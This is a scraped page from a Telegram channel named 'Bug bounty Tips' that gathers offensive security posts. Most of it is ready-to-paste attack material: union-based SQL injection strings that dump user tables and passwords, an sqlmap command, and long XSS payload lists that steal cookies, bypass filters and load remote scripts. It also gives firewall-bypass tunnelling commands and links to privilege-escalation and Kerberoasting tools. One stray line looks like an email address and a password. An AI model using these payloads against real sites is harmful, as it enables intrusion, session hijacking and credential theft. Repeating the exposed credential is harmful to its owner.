Bug bounty Tips
Открыть в Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Больше6 032
Подписчики
+1224 часа
+717 дней
+32530 день
Архив постов
6 036
[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
6 036
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
some of the top payloads which are used while practicing oscp
6 036
Pentesting Collection
Privilege Escalation
- Blog: Windows Privilege Escalation (Collection)
- Blog: Linux Privilege Escalation (Collection)
- Blog: Privilege Escalation via fail2ban
- Github: GossiTheDog/SystemNightMare
- Github: PEASS-ng
- Blogpost: NFS PrivEsc
- Blogpost: Bypassing the default UAC manually
- Github: CLSIDs for JP
- Blogpost: Using PetitPotam to NTLM Relay to Domain Administrator
- Paper: Abusing Kerberos: Kerberoasting
- Github: Kerberoast
- GitHub aclpwn.py
- Can be used to perform DCsync attacks and abuse the DACL
6 036
Today, I successfully discovered multiple directory listings. Here’s a quick guide to help you do the same:
1. Select Your Target: Identify the target website you want to test.
2.Use Request Intruder: Utilize tools like Burp Suite's Intruder to automate the process.
3.Set Positions: Configure the positions in your request, e.g., target.com/{wordlist}/.
4.Analyze Responses: Examine the status codes and response lengths to identify valid directories.
credit to respected owner.
6 036
+1
Just Reported XSS at Hackerone
Payload used :
"%5c"><body%2fonload%3d%26lt%3b!--%26gt%3b%26%2310confirm(1)%3bprompt(%2fXSS%2f.source)>"%2c
6 036
$23Million Bounty
WazirX Hunt Down bounty program
https://wazirx.com/blog/wazirx-bounty-program/
6 036
🥪Some XSS Payloads 😅
XSS Payloads
javascripta:alert(xss)//
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
onpointerenter%3Dconfirm%281%29
<inpuT autofocus oNFocus="setTimeout(function() { /*/top'al'+'\u0065'+'rt'/*/ }, 5000);"></inpuT%3E;
jeligob139@darkse.com
2Lc4q9P(Tw6w+6'X,q'cZ36wcAE6WD5M
"><img/src/onerror=.1|alert``
Set.constructoralert\x28document.domain\x29``
";alert('XSS');//
alert][0].call(this,1)
wp-json/wp/v2/
"><a href=javascript:alert(1)
<script>onerror=alert;throw'hacked';</script>
''"><script>(1)</script><iFrAme/src=jaVascRipt:prompt.valueOf()(1)+class=shetty></iFramE>
javascript:alert(document.cookie)
javascript://%0aalert(1)
"><script>alert(hello)</script>
<scri00pt0>eval[(1)]</sc00rip00t>
{{0[a='constructor'][a')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{].pop.constructor('alert\u00281\u0029')()}}
<svg><script%20?>confirm(1)
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg%2Fonload%3Deval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ%3D%3D’))>
<a href="javascript:alert(1)">Click Here</a>
<svg+onload='<script'-alert(1)>
<ScRiPt>alert(document.domain)</ScRiPt>
<ScRiPt/random>alert(document.domain);</ScRiPt>
<src<ScRiPt/random>ipt>alert(document.domain);<src</ScRiPt>ipt>
<scr\x00ipt>alert(document.domain)<scr\x00ipt>
"><img src=x onerror=alert(document.domain)>
"><!--><svg/onload=alert(document.domain)>
<iframe%00src="	javascript:prompt(document.domain)	%00>
<img src=1 onerror=print()>
<script>alert(document.domain)</script>
"onmousemove=alert("XSS_BY_shetty") "
<svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>>
<svg/onload=window["al"+"ert"]1337>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert(document.cookie)>
<sVG/oNLY%3d1/*/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><IMg%20SrC=x%20onerror=prompt(xss)>
<Svg%20On%20Only=1%20Onload=alert(1)>"
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb/['al'%2b'ert';//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=a
alert(origin)>
🔗 @bugbounty_tech 🔗
6 036
I got sick, I will be back by tomorrow and new BugBounty program is coming tomorrow
6 036
File-Tunnel
Tunnel TCP connections through a file. The program starts a TCP listener, and when a connection is received it writes the TCP data into a file. This same file is read by the counterpart program, which establishes a TCP connection and onforwards the TCP data. To avoid the shared file growing indefinitely, it is purged whenever it gets larger than 10 MB.
Example 1 - Bypassing a firewall
You'd like to connect from Host A to Host B, but a firewall is in the way. But both hosts have access to a shared folder.
Host A:
ft.exe --tcp-listen 127.0.0.1:5000 --write "\\server\share\1.dat" --read "\\server\share\2.dat"Host B:
ft.exe --read "\\server\share\1.dat" --tcp-connect 127.0.0.1:3389 --write "\\server\share\2.dat"
Now on Host A, configure the client to connect to: 127.0.0.1:5000
Example 2 - Tunnel TCP through RDP (similar to SSH tunnel)
You'd like to connect to a remote service (eg. 192.168.1.50:8888), but only have access to Host B using RDP.
Host A:
ft.exe --tcp-listen 127.0.0.1:5000 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"
Run an RDP client and ensure local drives are shared as shown here. Connect to Host B.
Host B:
ft.exe --read "\\tsclient\c\Temp\1.dat" --tcp-connect 192.168.1.50:8888 --write "\\tsclient\c\Temp\2.dat"Now on Host A, you can connect to 127.0.0.1:5000 and it will be forwarded to 192.168.1.50:8888
6 036
📚Web Application Penetration testing Study Plan
📝This study plan is based on milestones. So, check how much you can cover and close the checkboxes. The more you close, the better candidate you are for the job role. Also, I assume you have already checked and are comfortable with Common Security Skills study plan.
Just to make sure that everyone understands what you need to learn to be a pentester. It is altogether different from bug bounty, Red Team etc. but to excel in any of those roles you should be good at pentesting. It's not necessary that you can be a Red Teamer or Bug bounty hunter if you know pentesting. But a red teamer is surely very good at pentesting. Also, Vulnerability assessment is not pentesting, however, VAPT is a common skills required for pentesters job.
🔗https://github.com/jassics/security-study-plan/blob/main/web-pentest-study-plan.md
🔖#infosec #cybersecurity #hacking #pentesting #security
6 036
💉SQL Injection Vulnerability Scanner Tool's
🔹SQLMap – Automatic SQL Injection And Database Takeover Tool
🔗https://github.com/sqlmapproject/sqlmap
🔹jSQL Injection – Java Tool For Automatic SQL Database Injection
🔗https://github.com/ron190/jsql-injection
🔹BBQSQL – A Blind SQL-Injection Exploitation Tool
🔗https://github.com/Neohapsis/bbqsql
🔹NoSQLMap – Automated NoSQL Database Pwnage
🔗 https://github.com/codingo/NoSQLMap
🔹Whitewidow – SQL Vulnerability Scanner
🔗https://www.kitploit.com/2017/05/whitewidow-sql-vulnerability-scanner.html
🔹DSSS – Damn Small SQLi Scanner
🔗https://github.com/stamparm/DSSS
🔹explo – Human And Machine Readable Web Vulnerability Testing Format
🔗https://github.com/dtag-dev-sec/explo
🔹Blind-Sql-Bitshifting – Blind SQL-Injection via Bitshifting
🔗https://github.com/awnumar/blind-sql-bitshifting
🔹Leviathan – Wide Range Mass Audit Toolkit
🔗https://github.com/leviathan-framework/leviathan
🔹Blisqy – Exploit Time-based blind-SQL-injection in HTTP-Headers (MySQL/MariaDB)
🔗https://github.com/JohnTroony/Blisqy
🔖#infosec #cybersecurity #hacking #pentesting #security
6 036
🚀Found a subdomain running on Symfony debug mode.
👾Tip: Use EOS (https://github.com/synacktiv/eos) to get PHP variables and a lot more.
#BugBounty #bugbountytips #vulnerability
6 036
Nothing hits a man harder than realising he's growing older with zero progress in his life.
